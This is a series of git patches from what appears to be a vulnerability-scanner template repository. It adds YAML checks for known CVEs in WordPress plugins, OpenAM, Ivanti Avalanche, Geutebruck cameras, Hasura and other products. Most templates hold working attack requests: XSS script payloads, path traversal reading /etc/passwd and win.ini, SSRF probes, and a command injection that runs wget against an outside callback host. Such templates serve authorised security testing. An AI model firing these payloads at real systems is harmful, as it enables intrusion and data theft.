Sun, 11 Jul 2021 10:16:24 +0530 Subject: [PATCH 0451/4083] Update wp-socialfit-xss.yaml --- vulnerabilities/wordpress/wp-socialfit-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml index c91895ce84..50082d82a4 100644 --- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -8,7 +8,7 @@ info: SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: | - https://www.exploit-db.com/exploits/37481 - tags: wordpress,xss + tags: wordpress,xss,wp-plugin requests: - method: GET From 985bac8f8b565b22d6f1eb80c8a306a28cea15f2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 04:55:24 +0000 Subject: [PATCH 0452/4083] Auto Update README [Sun Jul 11 04:55:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ef3943ac47..ec7d630843 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 392 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 393 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1471 files**. +**127 directories, 1472 files**. From 8a6e78934c8353758f51e4b385224392fe8b6137 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 13:07:34 +0700 Subject: [PATCH 0453/4083] Create wp-church-admin-xss.yaml --- .../wordpress/wp-church-admin-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-church-admin-xss.yaml diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml new file mode 100644 index 0000000000..1b1ef0d8bd --- /dev/null +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-29395 + +info: + name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54329/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e6272bf44c2a6eef7e789b819b6883bdf4f147dc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 13:11:03 +0700 Subject: [PATCH 0454/4083] Create wp-knews-xss.yaml --- vulnerabilities/wordpress/wp-knews-xss.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-knews-xss.yaml diff --git a/vulnerabilities/wordpress/wp-knews-xss.yaml b/vulnerabilities/wordpress/wp-knews-xss.yaml new file mode 100644 index 0000000000..198ba8e35e --- /dev/null +++ b/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -0,0 +1,29 @@ +id: wp-knews-xss + +info: + name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54330/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E ' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From d3f21f1793f751cd09021afe8438b6b758ab2d02 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 13:19:01 +0700 Subject: [PATCH 0455/4083] Create wp-phpfreechat-xss.yaml --- .../wordpress/wp-phpfreechat-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-phpfreechat-xss.yaml diff --git a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml new file mode 100644 index 0000000000..986f90815a --- /dev/null +++ b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -0,0 +1,29 @@ +id: wp-phpfreechat-xss + +info: + name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54332/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 64bdaee44eda4d693acb56722226ee6e7add759c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 13:23:51 +0700 Subject: [PATCH 0456/4083] Create wp-finder-xss.yaml --- vulnerabilities/wordpress/wp-finder-xss.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-finder-xss.yaml diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml new file mode 100644 index 0000000000..d6abe3a568 --- /dev/null +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -0,0 +1,29 @@ +id: wp-finder-xss + +info: + name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/55217/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E ' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From f1690ec51b4bd0ab53c1cc522b9015d370544754 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 13:33:29 +0700 Subject: [PATCH 0457/4083] Create CVE-2012-4768.yaml --- cves/2012/CVE-2012-4768.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-4768.yaml diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml new file mode 100644 index 0000000000..2ebc5c7372 --- /dev/null +++ b/cves/2012/CVE-2012-4768.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 7f1b075cf01ddf0074030c085c9edd21f04515cd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 11 Jul 2021 13:37:39 +0530 Subject: [PATCH 0458/4083] Temporally removing as matcher needs to be improved. --- exposures/configs/git-config.yaml | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 7e8d21490f..9f030f2ce7 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -19,23 +19,11 @@ requests: Content-Length: 1 Connection: close - - | - GET /.git/logs/HEAD HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Content-Length: 1 - Connection: close - matchers-condition: and matchers: - type: word words: - "[core]" - - "root" - condition: or - type: dsl dsl: From 3bbcb23cd083a57d56f2219316d0d51d8b4c5046 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 11 Jul 2021 13:39:21 +0530 Subject: [PATCH 0459/4083] Severity update as this directly doesn't pose any risk. --- cves/2017/CVE-2017-5487.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 7da41d07b4..7322de0480 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -3,7 +3,7 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo - severity: medium + severity: info description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: | From 25dcb930ad9f902cbde61ba160b01c670be1b6da Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 11 Jul 2021 14:39:41 +0530 Subject: [PATCH 0460/4083] Added CVE-2021-29156 --- cves/2021/CVE-2021-29156.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2021/CVE-2021-29156.yaml diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml new file mode 100644 index 0000000000..b92aededf1 --- /dev/null +++ b/cves/2021/CVE-2021-29156.yaml @@ -0,0 +1,21 @@ +id: CVE-2021-29156 + +info: + name: LDAP Injection In Openam + author: melbadry9,xelkomy + severity: high + tags: cve,cve2021,openam + description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. + reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + +requests: + - method: GET + path: + - "{{BaseURL}}/openam/ui/PWResetUserValidation" + - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation" + - "{{BaseURL}}/ui/PWResetUserValidation" + + matchers: + - type: dsl + dsl: + - 'contains(body, "jato.pageSession") && status_code==200' From 74db4223c11d27a934ca1c417aa4abca9e70ad35 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Jul 2021 09:11:24 +0000 Subject: [PATCH 0461/4083] Auto Update README [Sun Jul 11 09:11:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ec7d630843..98355cc94c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 393 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 394 | vulnerabilities | 216 | exposed-panels | 192 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1472 files**. +**127 directories, 1473 files**. From c0f5105dcf6ad735934e222f7daafea2e4a32804 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 11 Jul 2021 18:31:18 +0900 Subject: [PATCH 0462/4083] Create CVE-2021-30497.yaml Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-30497.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-30497.yaml diff --git a/cves/2021/CVE-2021-30497.yaml b/cves/2021/CVE-2021-30497.yaml new file mode 100644 index 0000000000..e2a3ea14f8 --- /dev/null +++ b/cves/2021/CVE-2021-30497.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-30497 + +info: + name: Ivanti Avalanche Directory Traversal + author: gy741 + severity: high + reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ + tags: cve,cve2021,avalanche,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + + - type: status + status: + - 200 From 21195f9f0e0b1b1c6b70791112a59b9837416dca Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 17:06:48 +0700 Subject: [PATCH 0463/4083] Create CVE-2012-4242.yaml --- cves/2012/CVE-2012-4242.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-4242.yaml diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml new file mode 100644 index 0000000000..791034edfe --- /dev/null +++ b/cves/2012/CVE-2012-4242.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-4242 + +info: + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9788955ebd1827316c34265a61ebd2c60c2f064c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 11 Jul 2021 17:18:20 +0700 Subject: [PATCH 0464/4083] Create CVE-2013-2287.yaml --- cves/2013/CVE-2013-2287.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-2287.yaml diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml new file mode 100644 index 0000000000..33a0b554e1 --- /dev/null +++ b/cves/2013/CVE-2013-2287.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-2287 + +info: + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4ea2c71a3d416f6ec79db22ac061b33fec23c99d Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 12 Jul 2021 09:24:50 +0700 Subject: [PATCH 0465/4083] Add CVE-2020-24148 --- cves/2021/CVE-2020-24148.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2021/CVE-2020-24148.yaml diff --git a/cves/2021/CVE-2020-24148.yaml b/cves/2021/CVE-2020-24148.yaml new file mode 100644 index 0000000000..6723ab0df4 --- /dev/null +++ b/cves/2021/CVE-2020-24148.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-24148 + +info: + name: Import XML & RSS Feeds Wordpress Plugin <= 2.0.1 SSRF + tags: cve,cve2020,wordpress,wp-plugin,ssrf + author: dwisiswant0 + severity: critical + reference: https://github.com/dwisiswant0/CVE-2020-24148 + description: | + Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) + plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml" + body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0" + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 0e1e727bb1158240067db0ce217a6abfbe70af85 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 12 Jul 2021 13:10:31 +0900 Subject: [PATCH 0466/4083] Create CVE-2021-33544.yaml Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. CVE-2021-33543 : Authentication Bypass CVE-2021-33544 : Command injection multiple parameters Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-33544.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-33544.yaml diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml new file mode 100644 index 0000000000..f14bda44c2 --- /dev/null +++ b/cves/2021/CVE-2021-33544.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-33544 + +info: + name: Geutebruck RCE + description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ + tags: cve,cve2021,geutebruck,rce,oob + +requests: + - raw: + - | + GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.277 Whale/2.9.118.38 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + ding: gzip, deflate + Cache-Control: max-age=0 + Connection: keep-alive + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 0453f8e589a13e627b4535d3eb365df5f10b6517 Mon Sep 17 00:00:00 2001 From: Harsh kumar <51978908+harshinsecurity@users.noreply.github.com> Date: Mon, 12 Jul 2021 13:16:21 +0530 Subject: [PATCH 0467/4083] Create wix-takeover.yaml --- takeovers/wix-takeover.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 takeovers/wix-takeover.yaml diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml new file mode 100644 index 0000000000..8d88e4935b --- /dev/null +++ b/takeovers/wix-takeover.yaml @@ -0,0 +1,23 @@ +id: wix-takeover + +info: + name: wix takeover detection + author: harshinsecurity + severity: medium + tags: takeover + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + + matchers-condition: and + matchers: + - type: word + words: + - Error ConnectYourDomain occurred + - type: status + status: + - 404 From 74e2787c2acf1c0268baac78c54e984c8587f348 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 12 Jul 2021 18:45:23 +0900 Subject: [PATCH 0468/4083] Create wordpress-wordfence-lfi.yaml --- wordpress-wordfence-lfi.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 wordpress-wordfence-lfi.yaml diff --git a/wordpress-wordfence-lfi.yaml b/wordpress-wordfence-lfi.yaml new file mode 100644 index 0000000000..d730bafdc6 --- /dev/null +++ b/wordpress-wordfence-lfi.yaml @@ -0,0 +1,25 @@ +id: wordpress-wordfence-lfi +info: + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + author: 0x_Akoko + severity: high + reference: | + - https://www.exploit-db.com/exploits/48061 + - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ + tags: wordpress,wp-plugin,lfi,wordfence + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 201220c2f4ce9fe5f8d6eb8bfd799d2b3ea9b1ea Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 12 Jul 2021 18:48:37 +0900 Subject: [PATCH 0469/4083] Create kentico-open-redirect.yaml --- kentico-open-redirect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 kentico-open-redirect.yaml diff --git a/kentico-open-redirect.yaml b/kentico-open-redirect.yaml new file mode 100644 index 0000000000..c4c9decbc0 --- /dev/null +++ b/kentico-open-redirect.yaml @@ -0,0 +1,20 @@ +id: kentico-open-redirect + +info: + name: Web application Kentico CMS 8.2 Open Redirection + author: 0x_Akoko + description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability + reference: https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + severity: low + tags: kentico,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From c0396ad58b3f9e7fb375b4d9ac50f4d0e4cf5ca3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 12 Jul 2021 15:29:23 +0530 Subject: [PATCH 0470/4083] Update wix-takeover.yaml --- takeovers/wix-takeover.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 8d88e4935b..2b1a07b3ca 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -10,14 +10,12 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - matchers-condition: and + matchers-condition: and matchers: - type: word words: - - Error ConnectYourDomain occurred + - 'Error ConnectYourDomain occurred' - type: status status: - 404 From e570892138c592bf5c2c22013d1533b7c226470c Mon Sep 17 00:00:00 2001 From: 0x08 Date: Mon, 12 Jul 2021 13:40:30 +0300 Subject: [PATCH 0471/4083] Created fastapi-docs template FastAPI docs detection template. --- exposed-panels/fastapi-docs.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/fastapi-docs.yaml diff --git a/exposed-panels/fastapi-docs.yaml b/exposed-panels/fastapi-docs.yaml new file mode 100644 index 0000000000..6d1647c16b --- /dev/null +++ b/exposed-panels/fastapi-docs.yaml @@ -0,0 +1,21 @@ +id: fastapi-docs + +info: + name: FastAPI + author: github.com/its0x08 + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + condition: or + + matchers: + - type: word + words: + - "FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or From 9a59fa0e020d2c6bef3b0a8da7857fe2f01ce0fc Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 12 Jul 2021 18:11:45 +0530 Subject: [PATCH 0472/4083] Update fastapi-docs.yaml --- exposed-panels/fastapi-docs.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposed-panels/fastapi-docs.yaml b/exposed-panels/fastapi-docs.yaml index 6d1647c16b..e0925b7940 100644 --- a/exposed-panels/fastapi-docs.yaml +++ b/exposed-panels/fastapi-docs.yaml @@ -1,16 +1,17 @@ id: fastapi-docs info: - name: FastAPI + name: FastAPI Docs author: github.com/its0x08 severity: info + tags: fastapi,tech,panel + requests: - method: GET path: - "{{BaseURL}}/docs" - "{{BaseURL}}/redoc" - "{{BaseURL}}/openapi.json" - condition: or matchers: - type: word From 4ef8ed8e978cfd07d64f108a54d436a90cf5e434 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 12 Jul 2021 20:49:09 +0530 Subject: [PATCH 0473/4083] Create hasura-graphql-ssrf.yaml --- .../other/hasura-graphql-ssrf.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 vulnerabilities/other/hasura-graphql-ssrf.yaml diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml new file mode 100644 index 0000000000..e2fded76dc --- /dev/null +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -0,0 +1,49 @@ +id: hasura-graphql-ssrf +info: + name: Hasura GraphQL Engine - SSRF Side Request Forgery + author: princechaddha + severity: high + reference: https://cxsecurity.com/issue/WLB-2021040115 + tags: hasura + +requests: + - raw: + - | + POST /v1/query HTTP/1.1 + Host: {{Hostname}} + Content-Length: 381 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + content-type: application/json + Accept: */* + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + { + "type":"bulk", + "args":[ + { + "type":"add_remote_schema", + "args":{ + "name":"test", + "definition":{ + "url":"https://{{interactsh-url}}", + "headers":[], + "timeout_seconds":60, + "forward_client_headers":true + } + } + } + ] + } + + matchers-condition: and + matchers: + - type: status + status: + - 400 + + - type: word + part: interactsh_protocol + words: + - "http" From 58a79ddf4a5e0c6faaa8d44b06d54f9b59c1e11a Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Mon, 12 Jul 2021 16:21:03 +0100 Subject: [PATCH 0474/4083] Create QVISDVR-Java-Deserialization --- iot/QVISDVR-Java-Deserialization | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 iot/QVISDVR-Java-Deserialization diff --git a/iot/QVISDVR-Java-Deserialization b/iot/QVISDVR-Java-Deserialization new file mode 100644 index 0000000000..a11811614a --- /dev/null +++ b/iot/QVISDVR-Java-Deserialization @@ -0,0 +1,18 @@ +id: qvisdvr-java-deserialization + +info: + name: QVISdvr Java Deserialization + author: me9187 + severity: critical + description: Searches for /qvisdvr/index.faces use https://github.com/joaomatosf/jexboss to Get RCE! + references: https://github.com/joaomatosf/jexboss + tags: rce + +requests: + - method: GET + path: + - "{{BaseURL}}/qvisdvr/" + matchers: + - type: word + words: + - "/qvisdvr/index.faces" From 383f240d4bfa65d14a7b8e4f8533b00eb72acdff Mon Sep 17 00:00:00 2001 From: johnk3r Date: Mon, 12 Jul 2021 14:55:40 -0300 Subject: [PATCH 0475/4083] Create solarwinds-servuftp-detect.yaml --- .../solarwinds-servuftp-detect.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/solarwinds-servuftp-detect.yaml diff --git a/exposed-panels/solarwinds-servuftp-detect.yaml b/exposed-panels/solarwinds-servuftp-detect.yaml new file mode 100644 index 0000000000..f443f549a0 --- /dev/null +++ b/exposed-panels/solarwinds-servuftp-detect.yaml @@ -0,0 +1,29 @@ +id: solarwinds-servuftp-detect + +info: + name: SolarWinds Serv-U FileServer + author: johnk3r + severity: info + tags: solarwinds,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Serv-U" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 1a82b3da03cdcdae66682ccc835bd982fb96d7a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 12 Jul 2021 19:15:12 +0000 Subject: [PATCH 0476/4083] Auto Update README [Mon Jul 12 19:15:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 98355cc94c..371ea84927 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 394 | vulnerabilities | 216 | exposed-panels | 192 | +| cves | 394 | vulnerabilities | 216 | exposed-panels | 193 | | takeovers | 70 | exposures | 112 | technologies | 115 | | misconfiguration | 74 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 15 | -**127 directories, 1473 files**. 